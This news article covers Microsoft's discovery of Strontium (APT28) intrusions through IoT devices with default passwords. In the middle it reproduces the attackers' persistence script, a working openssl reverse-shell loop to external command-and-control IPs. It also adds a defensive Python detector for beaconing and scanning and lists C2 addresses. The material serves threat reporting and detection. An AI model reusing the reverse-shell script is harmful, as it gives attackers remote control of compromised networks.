The targets were VoIP phones, office printers and video decoders.
Specialists from the Microsoft Threat Intelligence Center (MSTIC) discovered attacks on corporate networks by the Strontium group that came in through Internet of Things devices. In some cases the attackers did not have to break anything at all: logging in with the default factory password was enough.
Microsoft has identified at least three such intrusions. The attackers tried to reach the internal network through a VoIP phone, an office printer and a video decoder. In two cases the device still had its factory password; in the third, the latest security update had not been installed.
The devices served as entry points. From them the attackers moved into the network and scanned it for other vulnerable devices, working towards accounts with higher privileges.
After gaining access to each device, the attackers ran a sniffer (tcpdump) to capture traffic on the local subnets. As they moved from one device to the next, they also dropped a simple shell script to establish persistence on the network.
—Contents of [IoT Device] file–
#!/bin/sh
# "[IoT Device]" is Microsoft's redaction of the device's own process name; the variable mimics the device's normal startup flags.
export [IoT Device]="-qws -display :1 -nomouse"
# Attempt counter in /tmp/.c. Loop a TLS-wrapped reverse shell (openssl s_client to the C2 on port 443, with sh reading commands from one connection and writing output to the other) until it succeeds; retry every 10 s and give up, killing openssl and removing the counter, after 30 failed attempts.
echo 1|tee /tmp/.c;sh -c '(until (sh -c "openssl s_client -quiet -host 188.8.131.52 -port 443 | while : ; do sh && break; done | openssl s_client -quiet -host 184.108.40.206 -port 443"); do (sleep 10 && cn=$((`cat /tmp/.c`+1)) && echo $cn|tee /tmp/.c && if [ $cn -ge 30 ]; then (rm /tmp/.c;pkill -f 'openssl'); fi); done)&' &
–end contents of file–
The script used by the attackers to maintain persistence on the network
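Two things in the account above leave a footprint in flow or firewall logs: the persistence script reconnects to the same external IP on port 443 roughly every 10 seconds (sleep 10 plus connect time) until it succeeds, and the compromised device then fans out to many internal hosts while scanning. The example below, added here and not part of Microsoft's report or tooling, hunts for both patterns over a constructed flow log. The IoT VLAN prefix, the log field layout and the thresholds are assumptions; the IPs in the sample log are documentation ranges, not the ones in the article.

```python
import statistics
from collections import defaultdict
from datetime import datetime

IOT_PREFIX = "10.20.30."  # assumed: the VLAN holding phones, printers and decoders
RFC1918 = ("10.", "192.168.") + tuple(f"172.{i}." for i in range(16, 32))

# Constructed flow records "timestamp src dst dst_port"; not real telemetry.
# 10.20.30.7 beacons every ~10 s to one external host on 443, then sweeps
# ten internal hosts. 10.20.30.9 checks in every 2 minutes (normal cloud
# telemetry). 10.0.0.50 is not an IoT device and is ignored.
LOG = """\
2019-08-05T10:00:00 10.20.30.7 198.51.100.9 443
2019-08-05T10:00:10 10.20.30.7 198.51.100.9 443
2019-08-05T10:00:21 10.20.30.7 198.51.100.9 443
2019-08-05T10:00:31 10.20.30.7 198.51.100.9 443
2019-08-05T10:00:41 10.20.30.7 198.51.100.9 443
2019-08-05T10:00:42 10.20.30.7 10.0.0.11 22
2019-08-05T10:00:42 10.20.30.7 10.0.0.12 22
2019-08-05T10:00:43 10.20.30.7 10.0.0.13 22
2019-08-05T10:00:43 10.20.30.7 10.0.0.14 445
2019-08-05T10:00:44 10.20.30.7 10.0.0.15 445
2019-08-05T10:00:44 10.20.30.7 10.0.0.16 23
2019-08-05T10:00:45 10.20.30.7 10.0.0.17 23
2019-08-05T10:00:45 10.20.30.7 10.0.0.18 80
2019-08-05T10:00:46 10.20.30.7 10.0.0.19 80
2019-08-05T10:00:46 10.20.30.7 10.0.0.20 8080
2019-08-05T10:01:00 10.20.30.9 203.0.113.4 443
2019-08-05T10:03:00 10.20.30.9 203.0.113.4 443
2019-08-05T10:05:00 10.20.30.9 203.0.113.4 443
2019-08-05T10:07:00 10.20.30.9 203.0.113.4 443
2019-08-05T10:09:00 10.20.30.9 203.0.113.4 443
2019-08-05T10:02:00 10.0.0.50 93.184.216.34 443
"""


def parse(log):
    """Turn the text log into (timestamp, src, dst, port) tuples."""
    flows = []
    for line in log.splitlines():
        if not line.strip():
            continue
        ts, src, dst, port = line.split()
        flows.append((datetime.fromisoformat(ts), src, dst, int(port)))
    return flows


def is_internal(ip):
    return ip.startswith(RFC1918)


def find_beacons(flows, min_hits=4, lo=8.0, hi=14.0):
    """IoT sources reconnecting to one external ip:port on a ~10 s cadence,
    i.e. the 'sleep 10' retry loop of the persistence script.
    Returns (src, dst, port, hit_count, median_gap_seconds) tuples."""
    by_key = defaultdict(list)
    for ts, src, dst, port in flows:
        if src.startswith(IOT_PREFIX) and not is_internal(dst):
            by_key[(src, dst, port)].append(ts)
    hits = []
    for key, stamps in by_key.items():
        if len(stamps) < min_hits:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        median_gap = statistics.median(gaps)
        if lo <= median_gap <= hi:
            hits.append((*key, len(stamps), round(median_gap, 1)))
    return hits


def find_scanners(flows, min_targets=8):
    """IoT sources touching many distinct internal hosts: a phone or printer
    has no business talking to a large slice of the LAN."""
    targets = defaultdict(set)
    for _, src, dst, _ in flows:
        if src.startswith(IOT_PREFIX) and is_internal(dst) and dst != src:
            targets[src].add(dst)
    return {src: len(t) for src, t in targets.items() if len(t) >= min_targets}


if __name__ == "__main__":
    flows = parse(LOG)
    for src, dst, port, n, gap in find_beacons(flows):
        print(f"beacon: {src} -> {dst}:{port}, {n} connections, median gap {gap}s")
    for src, n in find_scanners(flows).items():
        print(f"scan: {src} contacted {n} internal hosts")
```

The beacon window is deliberately wider than 10 s: the script sleeps 10 s between attempts, but a connect timeout or a TLS handshake to an unreachable C2 adds to each cycle, so real cadences drift upwards. The check only works if egress from the IoT VLAN is actually logged; many networks put phones and printers on a segment whose outbound traffic nobody records.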
Microsoft observed the compromised devices communicating with command-and-control servers at the IP addresses 220.127.116.11, 18.104.22.168, 22.214.171.124, 126.96.36.199 and 188.8.131.52. Its analysts attribute the activity to the group Microsoft tracks as Strontium, also known as Fancy Bear and APT28.
Cybersecurity researchers and the media link Fancy Bear to the Russian government. The group is credited with the 2016 hack of the US Democratic Party, attempts to compromise American officials, and attempts to interfere with the European elections in 2019.
Because Microsoft detected the IoT intrusions at an early stage, its analysts could not establish the attackers' ultimate objective. According to the company, in the past 12 months alone it has sent out 1,400 notifications of Strontium attacks worldwide. Most of the targets were in government, IT, the military, defense, medicine, education and engineering.